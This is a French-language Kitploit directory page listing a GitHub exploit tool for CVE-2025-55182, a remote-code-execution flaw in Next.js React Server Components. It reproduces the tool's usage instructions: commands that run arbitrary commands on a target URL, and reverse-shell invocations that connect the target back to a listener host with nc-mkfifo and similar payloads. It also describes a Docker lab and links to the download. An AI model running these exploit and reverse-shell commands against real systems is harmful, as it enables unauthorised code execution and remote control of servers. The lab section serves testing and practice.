Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Exploit pour CVE-2025-55182 permettant l'exécution de code à distance via la pollution de prototype dans les React Server Components de Next.js, avec exécution de commandes et capacités de shell inversé. | Kitploit
Outils/GitHubGitHub/mr-destroyer/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges UtilesLabs et Pratique
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

Exploit pour CVE-2025-55182 permettant l'exécution de code à distance via la pollution de prototype dans les React Server Components de Next.js, avec exécution de commandes et capacités de shell inversé.

Voir le dépôt
il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE des React Server Components de Next.js

Exploite CVE-2025-55182 pour une exécution de code à distance via une pollution de prototype.

Installation

root@kitploit:~
uv sync

Utilisation

Exécution de commande

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Shell inversé

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Options

  • -u, --url: URL/hôte à vérifier (obligatoire)
  • -c, --cmd: Commande à exécuter
  • -r, --reverse: Activer le mode shell inversé
  • -l, --lhost: Hôte d'écoute pour le shell inversé
  • -p, --lport: Port d'écoute pour le shell inversé
  • -P, --payload: Type de payload du shell inversé : nc, nc-mkfifo, sh, perl (par défaut : nc)
  • --timeout: Délai d'expiration de requête en secondes (par défaut : 10)
  • Exemples

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    Environnement de laboratoire

    Le répertoire lab/ contient une configuration Docker complète pour tester l'exploit.

    Configuration

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    Cela démarrera deux services :

    • vulnerable: Application Next.js vulnérable sur le port 3011
    • patched: Application Next.js corrigée sur le port 3012

    Tests

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    Télécharger l’outil